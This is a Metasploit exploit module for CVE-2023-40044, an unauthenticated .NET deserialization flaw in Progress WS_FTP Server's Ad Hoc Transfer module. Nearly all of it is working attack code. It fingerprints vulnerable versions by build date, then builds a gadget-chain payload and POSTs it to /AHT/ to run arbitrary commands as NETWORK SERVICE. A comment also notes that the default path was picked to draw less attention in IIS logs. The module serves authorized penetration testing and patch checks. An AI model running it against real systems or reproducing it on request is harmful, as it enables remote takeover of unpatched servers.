Progress Software WS_FTP Unauthenticated Remote Code Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code
          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server
          prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability
          was originally discovered by AssetNote.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
        ],
        'References' => [
          ['CVE', '2023-40044'],
          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],
          ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],
          ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044']
        ],
        'DisclosureDate' => '2023-09-27',
        'Platform' => %w[win],
        'Arch' => [ARCH_CMD],
        # 5000 will allow the powershell payloads to work as they require ~4200 bytes. Notably, the ClaimsPrincipal and
        # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g.
        # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume
        # all the available payload space via ./modules/nops/cmd/generic.rb).
        'Payload' => { 'Space' => 5000 },
        'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`.
        'Targets' => [
          [
            'Windows', {}
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in
        # the IIS logs as to what the request is for, however the user can change this as needed if required.
        Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']),
      ]
    )
  end

  def check
    # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/AHT/AHT_UI/public/index.html'
    )

    return CheckCode::Unknown('Connection failed') unless res

    title = Nokogiri::HTML(res.body).xpath('//head/title')&.text

    # We verify the target is running the AHT module, by inspecting the HTML heads title.
    if title == 'Ad Hoc Transfer'
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/AHT/AHT_UI/public/js/app.min.js'
      )

      return CheckCode::Unknown('Connection failed') unless res

      # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file
      # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,
      # but if it was build on Sept 2023 or after, it is not vulnerable.

      if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}
        day = ::Regexp.last_match(1).to_i
        month = ::Regexp.last_match(2).to_i
        year = ::Regexp.last_match(3).to_i

        description = "Detected a build date of #{day}-#{month}-#{year}"

        if year > 2023 || (year == 2023 && month >= 9)
          return CheckCode::Safe(description)
        end

        return CheckCode::Appears(description)
      end

      # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.
      return CheckCode::Detected
    end

    CheckCode::Unknown
  end

  def exploit
    unless datastore['TARGET_URI'].start_with? '/AHT/'
      fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')
    end

    # All of these gadget chains will work. We pick a random one during exploitation.
    chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties]

    gadget = ::Msf::Util::DotNetDeserialization.generate(
      payload.encoded,
      gadget_chain: chains.sample,
      formatter: :BinaryFormatter
    )

    # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.
    tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]

    message = Rex::MIME::Message.new

    part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)

    part.header.set('name', rand_text_alphanumeric(8))

    res = send_request_cgi(
      {
        'uri' => normalize_uri(datastore['TARGET_URI']),
        'ctype' => 'multipart/form-data; boundary=' + message.bound,
        'method' => 'POST',
        'data' => message.to_s
      }
    )

    unless res&.code == 302
      fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability')
    end
  end

end